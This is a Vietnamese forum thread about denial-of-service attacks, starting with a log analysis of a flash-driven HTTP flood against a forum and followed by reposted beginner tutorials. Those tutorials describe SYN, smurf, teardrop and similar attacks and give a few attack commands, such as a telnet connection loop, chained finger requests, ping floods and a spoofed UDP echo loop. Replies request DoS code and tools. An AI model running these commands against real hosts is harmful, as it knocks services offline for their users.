Cookie: session_id=433ab8bcc276414badb0e83891bbb9a6
Host: www.quangvinhonline.info
X-Forwarded-For: 203.210.233.28
Connection: Keep-Alive
Cache-Control: no-cache, bypass-client=203.210.233.28


Uh oh! Cái gì đây? Thử decode xem nó chứa gì, mấy cái %2, %3 xem chỉ tổ... mù mắt:

CODE

POST /forum/ HTTP/1.1
Accept: */*
x-flash-version: 7,0,19,0
Content-Type: application/x-www-form-urlencoded
Content-Length: 2387
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Cookie: session_id=433ab8bcc276414badb0e83891bbb9a6
Host: www.quangvinhonline.info
X-Forwarded-For: 203.210.233.28
Connection: Keep-Alive
Cache-Control: no-cache, bypass-client=203.210.233.28




Cái gì nổi bật trong hai đoạn trên? Đúng rồi: x-flash. Tại sao lại có chuyện dùng flash để "duyệt" HVA forum? Ngoài x-flash còn có những gì nổi bật? Có quá nhiều điểm nổi bật trong payload ở trên. Tuy nhiên, ứng dụng ra sao là yếu tố quyết định phải chọn những gì và ở đâu trong payload.

Hãy thử "dựng" lại các gói tin thuộc một "stream" tương tự để xét xem chúng có gì đặc biệt về mặt chuyển gởi và chuyển nhận gọi tin:


Tôi log vào HVA server lần nữa và "grep" -11- xuyên qua vài cái log cũ của web server chạy trên HVA. Ái chà, "bệnh" x-flash này đã xảy ra cũng đã nhiều ngày nhưng HVA không "chết" nổi, chỉ chậm lại ở những lúc cao điểm, chứng tỏ chiến thuật x-flash này không mấy hữu hiệu? Hay vì "chủ nhân" của mớ x-flash này chỉ cài chúng đâu đó rồi.... "sống chết mặc bây"? Tôi tiếp tục đào sâu trong mớ log đã cũ của HVA để hình thành vài con số thống kê. Sau hơn một giờ "chọc ngoáy" các log files và ghi chú thành một trang notepad chi chít chi tiết, tôi hình thành được khá nhiều thông tin hết sức lý thú, Những thông tin này khá phức tạp và tế nhị nên không thể công bố rộng rãi cho độc giả. Tôi đành phải tạm tóm lược như sau:
- căn bệnh x-flash này đã xảy ra nhiều tháng.
- trung bình mỗi ngày có khoảng +- 15,000 requests dùng x-flash vào HVA forum.
- các request này thường tập trung từ khoảng 6 giờ chiều cho đến khuya giờ VN.
- cao điểm các request này "đụng" vào HVA là khoảng 9 giờ tối.

Có thể rút tỉa được điều gì thuộc phương diện kỹ thuật từ những thông tin trên nhỉ?
- đám "x-flash" này có thể được xếp loại vào dạng DDoS vì chúng đến từ nhiều nguồn (IP) khác nhau cùng một lúc.
- chúng có cùng đặc tính (nói về mặt giao thức, kích thước và thái độ).
- có một số "stream" đi vào có cùng tính chất như các x-flash phá hoại này nhưng không hề mang "x-flash" trong header của HTTP POST, có lẽ chúng được một proxy server nào đó "lột" mất cái header?
- chúng hoàn toàn hợp lệ về mặt giao thức cho nên cấu hình server của HVA tiếp nhận chúng với "vòng tay rộng mở".
- và dường như chúng được gởi đến từ các máy con trong thời điểm duyệt Internet cao độ trong ngày.

Với những nhận định trên, tôi tin rằng các "con" x-flash kia không được chủ nhân điều tác theo kiểu master / zombies thông thường mà đây có thể là cách cài các "x-flash" trên những diễn đàn tương tự như HVA. Khi người dùng duyệt đúng trang web nào đó có gắn những "x-flash" này, chúng được dùng làm phương tiện để gởi request đến HVA server. Số lượng người truy cập các diễn đàn ấy càng nhiều thì số lượng request gởi đến HVA càng cao. Vậy, HVA phải đối phó ra sao?
- cản? cản ai? cản những gì? nếu phải cản thì chỉ có thể cản một mớ IP của các gateway hoặc các proxy server đi từ VN (là chủ yếu) và nếu vậy thì chuyện gì xảy ra? Đúng vậy! "x-flash" đã "deny service" thành công vì nó buộc HVA phải cản luôn những "kẻ vô can" trong cuộc chơi quái dị này.
- không cản? thì "căn bệnh" này cứ đeo đuổi mãi sao? và nếu cứ để như vậy thì chuyện gì xảy ra? tất nhiên là HVA server không thể "chết" nổi nhưng ảnh hưởng đến các thành viên (và khách) truy cập đến diễn đàn HVA là ảnh hưởng tiêu cực (chậm, đứt quãng, phí tài nguyên, phí băng thông...).

Có khá đầy đủ các dữ kiện cần thiết, tôi bắt đầu hình thành chiến thuật "trị" nhưng "trị" thế nào thì xin độc giả đón xem phần kế tiếp

<còn tiếp>

Các bạn ơi! Đang đọc chuyển qua trang thì thự nhiên bị cái lỗi này. Là gì vậy???

There seems to have been a slight problem with the database.
Please try again by pressing the refresh button in your browser.

An E-Mail has been dispatched to our Technical Staff, who you can also contact if the problem persists.

We apologise for any inconvenience.

to Swan

HVA đang đổi forum software.

Quote bài của conmale sao không quote của Yunie's death kiss

Bài của conmale không có nói detail về algorithm lol

ps : bác conma có qua đây đừng trách em nhé hehehe

Chưa đọc hết mấy bài nhưng mita xin post hết những gì mita học được về DoS.
Đây là bài viết của ai mita cũng không nhớ, chỉ nhớ là khi "làm thịt" trang hoctroquay thì "lụm" được bài này :
Bài viết chỉ dành cho mục đích học tập, và dành cho newbie, những người hoàn toàn không biết về tấn công từ chối dịch vụ (DOS), đây là những điểm cơ bản nhất về tấn công từ chối dịch vụ.

Có 2 cách để tấn công từ chối dịch vụ là kiểu lame (tạm dịch là kiểu dành cho những kẻ trình độ thấp) và elite (cách thức tiên tiến):

Kiểu lame

Bom thư- là kĩ thuật làm cho hòm thư của người khác bị lụt bởi các bức thư, đây là một trong những dạng thấp nhất của DOS. Mọi người đều có thể lên mạng để kiếm vài chương trình boom thư như UNA hoặc KABOOOM , điền hòm thư của nạn nhân và … gửi thư. Hòm thư của nạn nhân sẽ đầy ắp thư hoặc có 1 cách đơn giản hơn đó là đăng kí địa chỉ của hắn với một site ***, hòm thư của hắn sẽ bị boom mà bạn chẳng cần phải làm gì cả.

Nếu như nạn nhân là admin của một site nào đó thì bằng cách boom thư bạn đã tiêu tốn một lượng lớn không gian đĩa cứng của hắn.

Đăng nhập liên tiếp: giả sử một mail server cho phép bạn đăng nhập một số ít lần và bạn biết tên đăng nhập của hắn, bạn có thể dùng một chương trình để đăng nhập liên tiếp, khi đó nạn nhân sẽ không thể đăng nhập vào hòm thư, như vậy là bạn đã khoá đường vào của hắn.

Bây giờ thì sẽ là những cách tiên tiến hơn nhưng cũng đòi hỏi ở bạn trình độ và sự thông minh của bạn

Tràn Syn
Đây là cách tấn công vào phương thức bắt tay của TCP/IP
Trước tiên chúng ta hãy tìm hiểu một chút về TCP/IP

Cách bình thường:-
Syn-packet được gửi tới máy chủ bởi máy khách có ý định thiết lập kết nối

SYN
Máy khách --------------à Máy chủ

Ở bước thứ 2 máy chủ sẽ trả lời với một gói SYN/Ack tới máy khách

SYN/ACK
Máy khách ß-------------- Máy chủ


Bước thứ 3 và là bước cuối cùng.
Máy khách trả lời bằng một gói ack tới máy chủ và cơ chế bắt tay ba bước được hoàn thành

Bây giờ đến phần tấn công
Nhiều Syn-packet được gửi tới máy chủ thông qua một địa chỉ IP giả (địa chỉ IP chết hoặc không có), sau đó điều gì xảy ra, máy chủ sẽ trả lời với gói syn/ack và máy chủ đợi gói ack xác nhận. Nhưng vì địa chỉ IP không tồn tại nên nó vẫn phải chờ đợi, do vậy nó trì hoãn và tiêu tốn tài nguyên của hệ thống và làm cho hệ thống bị treo hoặc khởi động lại.

Land attack
Tấn công kiểu land attack cũng giống như tấn công kiểu tràn Syn nhưng thay bởi địa chỉ IP giả mạo hoặc chết thì nó sử dụng chính ngay IP của mục tiêu. Nó tạo ra một vong lặp vô tận và hệ thống đích bị phá vỡ. Nhưng hầu hết hệ thộng đều được thiết lập để chống lại kiểu tấn công này.

Smurf Attack
Là một dạng tấn công kiểu brute force (hàng loạt), trong đó một số lượng khổng lồ các router (định tuyến) sử dụng địa chỉ IP giả từ bên trong mạng đích, do đó khi nó nhận tín hiệu ping (thăm dò) nó sẽ phản hồi và làm lụt mạng. Và làm ngưng trệ giao thông mạng.

Lụt Udp
Đây là dạng tấn công 2 hệ thống đích và có thể sử dụng để ngừng các dịch vụ của 2 hệ thống. Cả 2 hệ thống được kết nối tới nhau, một tạo ra một chuỗi các kí tự cho mỗi gói nhận, theo cách nói khác là tạo ra các kí tự yêu cầu UDP trong khi đó hệ thống còn lại sẽ phản xạ lại mọi thông điệp mà nó nhận được. Do vậy tạo nên một vòng lặp vô hạn giữa 2 hệ thống, mọi dịch vụ khác giữa chúng bị tê liệt.

Ping of death
Kiểu tấn công này sẽ không làm việc được đối với các máy chủ đã được thiết lập để phòng ngừa nó. Trong kiểu tấn công này hệ thống đích được thăm dò bởi một gói vượt quá kích thước bình thường cho phép bởi giao thức tcp/ip và sẽ làm cho hệ thống đích bị treo hoặc khởi động lại

Tear Drop
Khi dữ liệu được gửi từ một hệ thống tới hệ thống khác nó được chia ra thành những mảnh nhỏ hơn và được máy đích tập hợp lại. Các gói này có một trường offset trong phần đầu của gói TCP là phần qui định phần dữ liệu nào được gửi đi. Nó kết hợp với số chuỗi, giúp cho máy đích có thể tập hợp các gói lại.

Trong phương thức tear drop các gói được chuyển đi với trường offfset chồng chéo, khiến cho máy nhận không thể ráp chúng lại và dẫn tới bị phá vỡ.

DDOS

Có một kiểu tấn công mới gọi là DDOS trong đó nhiều máy tính được sử dụng để tấn công từ chối dịch vụ.
============================
Còn một bài nữa nà :
========================
A. GIỚI THIỆU CHUNG

.A.1. DoS attack là gì?
DoS là làm cho các service bị tê liệt, ko còn đáp ứng được các request nữa. Loại attack này rất dễ thực hiện và lại rất khó bảo vệ hệ thống khỏi các DoS attack. vấn đề là Unix cho rằng hệ thống của users sẽ vẫn chạy được

.A.2. Có Hệ điều hành nào an toàn hơn ko?
Câu trả lời là ko. Tính an toàn của hệ thống phụ thụôc vào administrator.
Hệ thống Unix phức tạp hơn và có nhiều build-in prog cũng như services. điều này cũng mở ra nhiều cách để crash the system từ bên trong hơn win NT & 95 network.
Uniz có nhiều tools & prog để tìm ra các attack và giám sát users. Trong khi wind lại rất khó làm được.
Một unix admin trung bình thì cũng có nhiều kinh ngiệm hơn là microsoft admin.
Tóm lại unix an toàn hơn đối với DoS attack từ bên trong. Tuy nhiên microsoft lại có tính secure cao hơn đối với các attack từ bên ngoài chỉ vì nó có ít service hơn.


.B. ĐIỂM CƠ BẢN CHO 1 ATTACK

.B.1. SWAP SPACE
hầu hết các system đều có vài trăm MB swap space để phục vụ client requests. Swap space thuờng dùng cho các process con có thời gian ngắn nên DoS có thể được dựa trên phương thức làm tràn đầy swap space.

.B.2. BANDWIDTH
nếu bandwith quá cao, network sẽ trở nên vô dụng. Do đó hầu hết Dos att tác động lên bandwith bằng nhiều cách.

.B.3. KERNEL TABLES
làm tràn kernel tables có thể gây ra các vấn đề nghiêm trọng trên hệ thống đặc biệt là các h thống write caches và small write buffers.
Kernel memory allocation cũng là tiêu điểm nhạy cảm. kernel có giới hạn kernelmap, nên nếu system đạt đến giới hạn này nó ko thể định vị thêm kernel memory và fải reboot. Kernel memory ko chỉ use cho RAM, CPUs, Screen ... mà nó còn use cho các process thông thường. Nghĩa là bất cứ ht nào cũng có thể crashed nhanh chóng dễ dàng với những giải thuật nhỏ.
đối với solaris 2x lệnh sar có thể đo lường và bào cáo về kernel memory đang dùng. nhưng sunOS 4x thì ko có lệnh sar. nếu bạn use Solaris, use lệnh sar –k 1 để lấy thông tin, lệnh netstat –k cũng cò thể dùng để xem kermel memory đã chiếm bao nhiêu trong subpaging.

.B.4. RAM
Dos attack chiếm 1 khoảng lớn của RAM cũng có thể gây ra các vấn đề lớn. NFS và mailserver là dễ bị attack nhất vì chúng ko cần nhiều RAM. 1 NFS client thường sẽ tạo ra rất nhiều catching, nhưng 1 NFS client cũng có thể là anything trong prog mà bạn có thể tự viết lấy.

.B.5. DISKS
1 cách attack cổ điển là làm đầy harddisk. HD có thể bị overloaded và ko thể use bằng nhiều cách.

.B.6. CACHES
DoS attack liên quan đến caches được dựa trên phương pháp làm tắc nghẽn or ngăn ngừa cache.
Trong solaris 2x:
Directory name lookup cache: liên hệ tên file với vnode.
Inode cache: thông tin cache đọc từ đĩa trong trường hợp cần đọc lại.
Rnode cache: giữ thông tin về ht file NFS.
Buffer cache: cache Inode làm tắc nghẽn gián tiếp I/O của đĩa thực.

.B.7. INETD
1 khi inetd bị crashed, tất cả các service khác đi qua inetd sẽ ko còn làm việc được nữa.

.C. ATTACK TỪ BÊN NGOÀI.

.C.1. Sự thuận lợi của Finger
hầu hết các prog finger đều hỗ trợ chuyển tiếp đến host khác. Vd: $finger @system.two.com@system.one.com finger đi qua system.one.com và system.two.com. do đó two sẽ tưởng là one finger mình. pp này dùng để che dấu cũng như cho các very dirty DoS attack. Hãy xem vd sau: $finger @@@@@@@@@@@@@@@@@@@@@@host.we.attack tất cả các @ sẽ nhận finger để finger host.we.attack rất nhiều lần làm host này bị ảnh hưởng rất lớn.
biện pháp là cài đặt finger ko hỗ trợ chuyển tiếp như GNU finger, or bạn cũng có thể tắt finger service.

.C.2. UDP AND SUNOS 4.1.3.
sunOS 4.1.3 bị lỗi boot nếu bạn gởi tới 1 packet với thông tin sai trong header. Đây là nguyên nhân nếu như ip-options biểu diễn sai kích cỡ của packet.
biện pháp: cài đặt patch đúng.

.C.3. Làm tê liệt X-WINDOWS
nếu host cho phép telnet tới X-Windows port (thường là từ 6000 đến 6025), bạn có thể làm tê liệt cả ht x-windows bằng cách tạo ra hàng loạt kết nối telnet or prog gởi hàng loạt XopenDisplay() đến port đó. điều này cũng có thể áp dụng cho Motif or Open windows.
biện pháp: đóng kết nối tới x-windows port.

.C.4. Cố ý sử dụng UDP SERVICES
rất dễ use UDP services (như echo, time, datetime, chargen) lặp lại 1 cách liên tục nhờ các IP-spoofing thông thường. Vd:
from-IP=127.0.0.1
to-IP=system.we.attack
packet type:UDP
from UDP port 7
to UDP port 7
header yêu cầu là packet đến từ 127.0.0.1 (lặp lại liên tục) và tiêu điểm là echo port tại system.we.attack. đến khi system.we.attack biết là 127.0.0.1 system.we.attack và vòng lặp được thiết lập. chú ý là system.we.attack trông giồng như DNS-name nhưng tiêu điểm luôn luôn là 1 IP number.

.C.5. ATTACKING WITH LYNX CLIENTS
www server sẽ tách httpd process thành phản hồi cho các request từ client. Process chỉ kéo dài khoảng 1 giây và vì thế load sẽ ko thực hiện được nếu bạn use ps. DoS atack use hàng loạt w3 client (lynx client) là rất an toàn nhưng nên nhớ là lệnh netstat cũng có thể phát hiện ra attack.
Httpd:s (như http-gw)

.C.6. Telnet
use thử script này:
while : ; do
telnet system.we.attack &
done
atack kiểu này cũng tốn 1 ít bandwith, nhưng nó chẳng là gì so với pp finger or các pp khác. Nhưng 1 số firewalls & httpd:s lại nghĩ đây là vòng lặp và tự động tắt chúng, cho đến khi admin gởi lệnh kill - HUP

.C.7. use telnet trong SOLARIS 2.4
nều attacker tạo ra kết nối telnet tới solaris 2.4 host và thoát ra use:
control -}
quit
thì inetd sẽ tiếp tục mãi mãi (ít nhất là vài trăm lần)
biện pháp: cài đặt patch đúng.

.C.8. làm sao để DISABLE ACCOUNTS
1 vài ht disable accout sau n lần bad login or chờ n giây. bạn có thể use tíng năng này để lock out 1 user nào đó từ ht.

.C.9. LINUX AND TCP TIME, DAYTIME
inetd trong linux có thể bị crash nếu gởi nhiều SYN packet tới daytime (port 13) or time (port 37)

.C.10. attack bằng chuyển tiếp ICMP
gateways use chuyển tiếp ICMP để yêu cầu ht overide routing tables. để vô hiệu chuyển tiếp icmp, bạn fải biết kết nối hiện tại để gởi tới 1 route làm đứt kết nối or gởi tới host messages lỗi nều như kết nối đó ko use cryptation
vd: (gởi messages lỗi)
destination unreachable
time to live exceeded
parameter problem
packet too big
message này sẽ reset kết nối.

.C.11. BROADCAST STORMS
đây là pp thông dụng nhất trong mạng mà host hoạt động như các gateway. pp cơ bản là gởi nhiều packet tới tất cả các host với đích đến ko có thực. mỗi host sẽ cố gắng chuyển từng packet dẫn đến packet đó được chuyển lòng vòng trong 1 thời gian dài và nếu có packet mới được tiếp tục gởi tới mạng sẽ nhanh chóng gặp rắc rối.
loại attack này có thể là ping, finger, & sendmail. Nhưng hầu hết services có thể vô hiệu bằng vài cách khác.

.C.12. SYN FLOODING
syn packet được use trong 3-way handshake do đó syn flooding attack được dựa trên pp incomplete handshake. Attacker host gởi tới tấp các syn packet nhưng ko phản hồi lại các ACK packet.
bạn có thể xem thêm về syn flooding tại:
[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
Article by Christopher Klaus, including a "solution".

[.2.] http://jya.com/floodd.txt
2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane

[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
IP-spoofing Demystified by daemon9 / route / infinity
for Phrack Magazine

.C.13. PING FLOODING
unix: ping –s host
windows 9x: ping –t –l 256 ***.***.***.***
ex: ping –l 65510 address.to.the.machine
nó có thể bị tê liệt or reboot.
* Kernel phiên bản từ 2.0.7 đến 2.0.20 or AIX4, OSF, HPUX10.1, DUXIX 4.0 -->> crashed
* OSF/1, 3.2C, solaris 2.4 x86 -->> reboot.

.C.14. FLEXlm
bất cứ host nào chạy FLEXlm có thể bị shutdown bằng lệnh:
#lmdown –c /etc/licence.dat
lmdown – copyright © 1989, 1991 highland software, inc.
shutting down FLEXlm on nodes: ***
are you sure? [y/n]: y
shut down the node ***
#.

=======================
The End
=======================
To Admin : Nếu có thành lập ddth attacker thì mita vào group đầu tiên nha

Cho mình tham gia chút, trong các mạng ngang hàng, có thể sử dụng DDoS được không? Có cách nào tối ưu để chống DDoS trong các mạng P2P ???

Các bác cho em hỏi câu này với: Theo các bác thì DoS là cách tấn công để làm cho hệ thống tê liệt trong việc cung cấp các dịch vụ chứ không phải là để truy cập trái phép hay đánh cắp thông tin à? Nếu vậy thì sau khi hệ thống bị tê liệt kiểu này, các tính năng bảo mật của nó có bị suy giảm hay không? Nếu có thì các bác có thể chỉ giúp em 1 số lỗ hổng được không?

tấn công tràn ngập làm die server không lấy cắp hay trộm cướp gỉ cả nó là kiểu "không ăn được thỉ đạp đổ " thôi !:D:D

Ban nao co chuong trinh Nuker thi chi minh nha.Cam on (sorry ko post duoc tieng Viet)

tấn công tràn ngập làm die server không lấy cắp hay trộm cướp gỉ cả nó là kiểu "không ăn được thỉ đạp đổ " thôi !:D:D
quên nó đi, mấy cái kiểu tấn công nêu ra ở đây là xưa rồi, nếu ai đó biết xài iptables, ipfilter...thì không còn áp dụng được mấy kiểu tấn công này nữa đâu đừng có nằm mơ nữa, thức dậy đi trời sáng rồi :D

quên nó đi, mấy cái kiểu tấn công nêu ra ở đây là xưa rồi, nếu ai đó biết xài iptables, ipfilter...thì không còn áp dụng được mấy kiểu tấn công này nữa đâu đừng có nằm mơ nữa, thức dậy đi trời sáng rồi

sao lai khong ha? ban., hau het cac site bay gio co muc do secure rat tot, hau nhu chi co cach tan cong hieu qua nhat la DOS, theo toi duoc biet thi` quynh la 1 pro ve DDOS attack, ko co y kien gi them :)

moi tham gia forum
thay cac bac huong dan tan tinh that

Xin loi truoc vi may toi bi truc trac nen khong danh tieng Viet duoc.

Toi khong phai la mot nguoi gioi lam ve tin hoc nhung cung xin gop y ve 2 bai viet DDos o tren:

1: Hai bai viet do rat chung chung, khong noi len duoc gi ca. Nhung bai viet kieu nhu vay day o trong cac sach ebook. Neu ban chiu kho doc ebook con chi tiet hon.

2: Toi khong biet kha nang cua nhung nguoi do la bao nhieu ma cung co nguoi de cu lam mod, chang le mod cua DDTH chi co vay thoi sao (chung chung qua).

Dieu cuoi cung (quan trong): Mac du la noi chung chung, nhung cac bai viet DDos tren cung khong phai tu nhung nguoi do viet, nhung bai viet do da xuat hien tu rat lau o tren trang hvaonline roi, cung chi la copy roi post lai thoi.

Bác này cũng nên xem lại ngày tháng của các bài post đó. Đừng nói vậy mà gây hiểu nhầm. Ko cần quan tâm là của ai, chỉ cần biết knowledge belongs to the world, thì nó của ai cũng thế.
Tớ chỉ cảm thấy buồn một điều là bây giờ ngày càng ít những pioneer có thời gian và tâm huyết để chia sẻ những hiểu biết của mình cho người khác. Ừ, ngày càng ít, mặc dù cntt ngày càng phát triển. Mà có khi chính vì thế cntt mới phát triển !? Người có năng lực cần có thêm thời gian để học tập, nâng cao kiến thức và mở rộng tầm hiểu biết... cái này có nói cả ngày cũng chưa thỏa.
Thôi, lâu lâu được bốc phét một lần thế là sướng rồi, tớ xin phép ra ngoài chơi.

ddth.com wuả là ngọa hổ tàng long....

hay quá đây là một chủ đề nóng hổi
mọi người đóng góp nhiệt tình nha

Bây giờ hình như mọi người thích xì-tin DDOS-FLASH thì phải ???
Cái này mà DDOS thì có trời mới cứu nổi...

Híc chỉ tại tui chưa đọc cái topic này chứ kô thì đâu có yêu cầu thêm box ddos đâu ?
Các bác thảo luận hay quá xin bái làm sư phụ
Híc
Bác bảo có ebook về ddos à ?
Vậy share lên cho anh em cùng đọc đi
Còn coppy hay kô kô quan trọng
Cái quan trọng là hiểu được bản chất của chúng

Tôi cũng nghĩ như mọi người vậy, chúng ta không có gắng trở thành một hacker để rồi hack các server...Còn tôi tìm hiểu về DDos để có sự hiểu biết về nó, để nếu có gặp còn biết đó là do tấn công DDos...để còn biết mà phòng chánh(nếu có thể). Cảm ơn các tiền bối đã post các bài viết bổ ích.

Hiện tại tình trạng flood , dos , các website khá nhiều mong rằng ddth có thể share code antidos để giúp cho mọi người , giúp cho nền phát triển CNTT của Việt Nam .

Thân ái !

bài viết quá hay !!!!!!!!!!!!!!!

có thể viết thêm ít bài về ddos ko ?

hì hì, nếu e ko nhầm thì DOS là trò game Dawn of Soul đúng ko, trò này hay lắm, nhưng sao em chơi đến Act 8, đoạn vào lâu đài thì ko đi được nữa. Có anh chị nào bít chỉ em với.

Mới lại chỉ em cách hack bằng trò này nhé, e tưởng nó là game mà. ko biết em cài trò này vào máy thì có bị virus ko vậy.

Dzô dziên ghê ta ơi, game gì ở đây :) hack hiếc cái gì

Thanks các Pro nhiều nha!! mình đã học được khá nhiều từ đây

Chào mọi người , Tôi thấy Ddos của http://freecodevn.com rất hay . không biết ai đã share ddos này chưa? link share ?
Tôi rất cần code DDos này .
Thanks!

mình rất muốn tiếp thu nhưng khả năng lĩnh hội của mình còn kém quá, mong được giúp đỡ thêm nhiều nhé các bạn

Em là newbie.Em hiện đang làm đồ án cái DoS.Em có thể gặp đại ca Như Quỳnh ko?Em o TPHCM.Em chờ hối âm của đại ca.

Mấy đại ca có ai rành DDoS ở TPHCM ko?Em chi cần làm demo mang Lan thôi?

Giờ DDOS là dành cho mí đứa trẻ con tập hack .

Mình tìm được ở đây có thông tin bổ ích cho ai quan tâm DDOS này
http://forum.itlab.com.vn/forum/showthread.php?t=1289
http://forum.itlab.com.vn/forum/showthread.php?t=1273

Vậy có thể chống lại một cuộc tấn công được không?
Vì theo mình hiểu thì các truy vấn đến server là hợp lệ, chỉ có điều là quá nhiều gây ra hiện tượng tràn băng thông, chiếm dụng tài nguyên máy chủ. Mình đang quản lý một website, nên rất quan tâm đến vấn đề này(mình chỉ tự học thôi, không phải Pro như bạn).

Xin chỉ rõ hơn.
-----------------------
http://www.timnhadat.com

mình là dân mới.có đọc qua một số bài viết của bạn Q. rất mong bạn chỉ giúp mình,có thề cho mình link để học Network và OS căn bản ko?.xin cảm ơn

Chị ấy chắc giờ ít vào diễn đàn rồi thấy bài cuối post vào năm 2003 cơ mà
Cả anh Frakshin Dong nữa.
Em cũng muốn tìm hiểu về phần này mà các phần viết ở trên nghe như vịt nghe sấm

Tốt nhất chơi 1 Server thật khỏe, thuê mấy thằng ngồi trông, có IP nào truy cập nhiều đáng nghi là ban lun.

Các cậu dùng tool DosHTTP để kiểm tra mức độ hardened của web server mình thử nhé, tớ nghe nói cái đó cũng hay lém.
Các bạn xem hướng dẫn theo link bên dưới nhé
http://hack2learn.net/showthread.php?t=757
Nhớ là chỉ dùng để kiểm tra website mình thôi nhé.

Hom nay vo tinh dao choi co gap mot mod trong dien ddth viet ve IT security ---Hack. Cac bai viet cua cac ban rat hay ...

[=========> Bổ sung bài viết <=========]

-Nguoi thi di tim loi ich cho rieng nguoi .
-Nguoi thi di bao ve loi ich cho minh.
-----> Tat ca deu vi loi ich >---------->>>>>>>>>>>>LOI ICH

Mình rất khâm phục sự hiểu biết của bạn nhuquynh.
Bạn nhuquynh ơi cho mình hỏi bạn có biết cách tấn công và phòng thủ vào MySQL,MS SQL SERVER không. Nếu bạn biết thì xin cho mình được thọ giáo nhé,
Mình có 1 trang web bi tấn công trong database của mình có sự thay đổi lạ.
Mong được bạn chỉ giúp.

bài viết cua Q hay lắm , tuy chưa hiều rỏ về mạng va cach tấn công của hacker nhưng đọc qua bài này mình cũng hiểu dược cơ bản rùi ! thanh all

Học học nữa học mãi
Học để cãi với người ta

nhuquynh,
Thanks for the link.

Tôi thì cảm thấy khá lạ là tại sao nhiều SV/HS bên VN lại ham học làm "hacker". Quí vị còn nhớ vụ "love bug" không?;) Tại sao FBI có thể tóm được người gừi virus bên Philipines nhỉ ;) ;)

Giới trẻ Việt Nam bây giờ thích thú với nhừng gì mới lạ và được cảm giác hơn người khi trở thành hacker(tui cũng vậy he he:D nhưng chưa có khả năng thui)he he

[=========> Bổ sung bài viết <=========]


cac ban oi minh cung vua tham gia vao trang nay theo kien thuc cua minh cung khong la bao cho minh them y kien nha, cac ban da la cao thu roi nhung tai sao cac ban khong hieu mot dieu rang tai sao Microsoft lai ban he dieu hanh MSDos voi gia la 50 trieu dolar vi do la nhung phan cac ban co the tham chieu tat cac mang hay tham chieu tat nhung trong may minh,
vi du nhu co nhung phan tai sao lai bat buoc chugn ta phai dung Dos thi moi thuc thi duoc hong biet cac ban hieu van de do khogn tai sao mang lai can thiet ve dos nhu vay va cac cong ty lon tai sao cac nha quan tri cam cac user khong cho chay dos va giao cho ho mot so quyen vi dos co the khong dang nhap ma van co the vao duoc hong biet cac ban biet cach do khong, toi cung khong biet nua cac ban nghi toi noi dung khong ne
vi du tai sao khi chugn ta cap quyen cho mot thanh vien la readonly khi ho vao dos thi duoc quyen write hoi cac ban do
chi co cong nghe cua phap va my la dung nhieu lenh dos nhat khong tin hom nao cac ban tim mot nguoi phap hay nguoi my biet ranh va mang ban se thay ho se khong bao gio dung windows ma chi dung dos thoi ah vi khi chung ta dung windows thi no se ghi lai mot so thong tin cua cong viec ta lam nen tai sao nhung nguoi co cong viec bao mat va gioi thi ho dung dos

viết tiếng việt có dấu đi bạn ơi

[=========> Bổ sung bài viết <=========]


Chưa đọc hết mấy bài nhưng mita xin post hết những gì mita học được về DoS.
Đây là bài viết của ai mita cũng không nhớ, chỉ nhớ là khi "làm thịt" trang hoctroquay thì "lụm" được bài này :
Bài viết chỉ dành cho mục đích học tập, và dành cho newbie, những người hoàn toàn không biết về tấn công từ chối dịch vụ (DOS), đây là những điểm cơ bản nhất về tấn công từ chối dịch vụ.

Có 2 cách để tấn công từ chối dịch vụ là kiểu lame (tạm dịch là kiểu dành cho những kẻ trình độ thấp) và elite (cách thức tiên tiến):

Kiểu lame

Bom thư- là kĩ thuật làm cho hòm thư của người khác bị lụt bởi các bức thư, đây là một trong những dạng thấp nhất của DOS. Mọi người đều có thể lên mạng để kiếm vài chương trình boom thư như UNA hoặc KABOOOM , điền hòm thư của nạn nhân và … gửi thư. Hòm thư của nạn nhân sẽ đầy ắp thư hoặc có 1 cách đơn giản hơn đó là đăng kí địa chỉ của hắn với một site ***, hòm thư của hắn sẽ bị boom mà bạn chẳng cần phải làm gì cả.

Nếu như nạn nhân là admin của một site nào đó thì bằng cách boom thư bạn đã tiêu tốn một lượng lớn không gian đĩa cứng của hắn.

Đăng nhập liên tiếp: giả sử một mail server cho phép bạn đăng nhập một số ít lần và bạn biết tên đăng nhập của hắn, bạn có thể dùng một chương trình để đăng nhập liên tiếp, khi đó nạn nhân sẽ không thể đăng nhập vào hòm thư, như vậy là bạn đã khoá đường vào của hắn.

Bây giờ thì sẽ là những cách tiên tiến hơn nhưng cũng đòi hỏi ở bạn trình độ và sự thông minh của bạn

Tràn Syn
Đây là cách tấn công vào phương thức bắt tay của TCP/IP
Trước tiên chúng ta hãy tìm hiểu một chút về TCP/IP

Cách bình thường:-
Syn-packet được gửi tới máy chủ bởi máy khách có ý định thiết lập kết nối

SYN
Máy khách --------------à Máy chủ

Ở bước thứ 2 máy chủ sẽ trả lời với một gói SYN/Ack tới máy khách

SYN/ACK
Máy khách ß-------------- Máy chủ


Bước thứ 3 và là bước cuối cùng.
Máy khách trả lời bằng một gói ack tới máy chủ và cơ chế bắt tay ba bước được hoàn thành

Bây giờ đến phần tấn công
Nhiều Syn-packet được gửi tới máy chủ thông qua một địa chỉ IP giả (địa chỉ IP chết hoặc không có), sau đó điều gì xảy ra, máy chủ sẽ trả lời với gói syn/ack và máy chủ đợi gói ack xác nhận. Nhưng vì địa chỉ IP không tồn tại nên nó vẫn phải chờ đợi, do vậy nó trì hoãn và tiêu tốn tài nguyên của hệ thống và làm cho hệ thống bị treo hoặc khởi động lại.

Land attack
Tấn công kiểu land attack cũng giống như tấn công kiểu tràn Syn nhưng thay bởi địa chỉ IP giả mạo hoặc chết thì nó sử dụng chính ngay IP của mục tiêu. Nó tạo ra một vong lặp vô tận và hệ thống đích bị phá vỡ. Nhưng hầu hết hệ thộng đều được thiết lập để chống lại kiểu tấn công này.

Smurf Attack
Là một dạng tấn công kiểu brute force (hàng loạt), trong đó một số lượng khổng lồ các router (định tuyến) sử dụng địa chỉ IP giả từ bên trong mạng đích, do đó khi nó nhận tín hiệu ping (thăm dò) nó sẽ phản hồi và làm lụt mạng. Và làm ngưng trệ giao thông mạng.

Lụt Udp
